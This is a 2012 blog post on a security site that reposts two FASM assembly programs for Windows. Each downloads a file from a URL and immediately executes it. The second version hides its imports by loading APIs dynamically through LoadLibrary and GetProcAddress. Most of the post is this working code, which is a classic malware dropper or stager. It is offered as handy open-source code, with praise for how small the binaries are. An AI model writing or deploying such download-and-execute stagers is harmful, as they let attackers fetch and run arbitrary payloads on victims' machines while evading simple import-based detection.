Thursday, May 23, 2013
Breaking News
You are here: Home / Programming / Open Source / ASM – Downloader

ASM – Downloader

Posted by: FastFlux January 28, 2012 in Open Source, Other Languages, Programming Leave a comment

I found this nice piece of code on this website: http://wiremask.eu.  Why is ASM so good?  Well first of all it compiles into the smallest binary’s you have ever seen.

“A new development tutorial has been added. It explains how to code a file downloader + executer in assembly language using FASM compiler.

Link to full tutorial : http://wiremask.eu/page.php?id=2

The first code is the msot simple and clear dile downloader, it shows how to use windows API, the compiled file size is 2KB.”

downexec.asm

format PE GUI 4.0
; ASM Downloader Tutorial
; Simple Version
; Download and Execute a File
; 2012 By Wiremask.eu
 
; choose Entry point
entry start
include 'includewin32a.inc'
; Declare Constants
section '.data' data readable writeable
_file        db 'file.htm',0
_url        db 'http://wiremask.eu/',0
 
section '.code' code readable executable
; Entry point
start:
; Call download of _url
invoke URLDownloadToFile, 0, _url, _file, 0, 0
; Call execution of _file
invoke ShellExecute, 0, 0, _file, 0, 0, SW_SHOW
; Exit Application
invoke ExitProcess, 0
 
; Declare API
section '.idata' import data readable
library kernel32,'kernel32.dll',
urlmon,'urlmon.dll',
shell32,'shell32.dll'
import kernel32,
ExitProcess,'ExitProcess'
import urlmon,
URLDownloadToFile,'URLDownloadToFileA'
import shell32,
ShellExecute,'ShellExecuteA'

This next code is a bit more complicated, it load API dynamically at runtime using GetProcAddress and LoadLibrary.

dyndownexec.asm

format PE GUI 4.0
; ASM Downloader Tutorial
; Advanced Version ( Dynamic )
; Download and Execute a File
; 2012 By Wiremask.eu
 
; choose Entry point
entry start
include 'includewin32a.inc'
; Declare Constants
section '.data' data readable writeable
_urlmon                db 'urlmon.dll',0
_shell                db 'shell32.dll',0
_URLDownloadToFile    db 'URLDownloadToFileA',0
_ShellExecute        db 'ShellExecuteA',0;
 
_url    db 'http://wiremask.eu/',0
_file    db 'file.htm',0
 
section '.code' code readable executable
start:
; Load urlmon.dll
invoke LoadLibrary, _urlmon
cmp eax, 0
je exit
; Get adress of URLDownloadToFileA function
invoke GetProcAddress, eax, _URLDownloadToFile
cmp eax, 0
je exit
; Set parameters of URLDownloadToFileA
push eax
push 0
push 0
push _file
push _url
push 0
; Call URLDownloadToFileA
call eax
pop eax
; Free urlmon.dll
invoke FreeLibrary, eax
 
; Load shell32.dll
invoke LoadLibrary, _shell
cmp eax, 0
je exit
; Get adress of ShellExecute function
invoke GetProcAddress, eax, _ShellExecute
cmp eax, 0
je exit
; Set parameters of ShellExecute
push eax
push SW_SHOW
push 0
push 0
push _file
push 0
push 0
; Call ShellExecute
call eax
pop eax
; Free shell32.dll
invoke FreeLibrary, eax
 
exit:
; Exit Application
invoke ExitProcess, 0
 
; Declare API
section '.idata' import data readable
library kernel32,'kernel32.dll'
 
import kernel32, ExitProcess, 'ExitProcess',
LoadLibrary,'LoadLibraryA',
GetProcAddress, 'GetProcAddress',
FreeLibrary, 'FreeLibrary'

About FastFlux

Owner of ZeroSecurity, intrested in programming, malware analysis and penetration testing. If you are interested in joining the ZeroSecurity team please use the contact forum located above to contact us.
Powered by ZeroSecurity | Designed by Tielabs
© Copyright 2013, All Rights Reserved
Scroll To Top
x
EmailEmail
PrintPrint
WP Socializer Aakash Web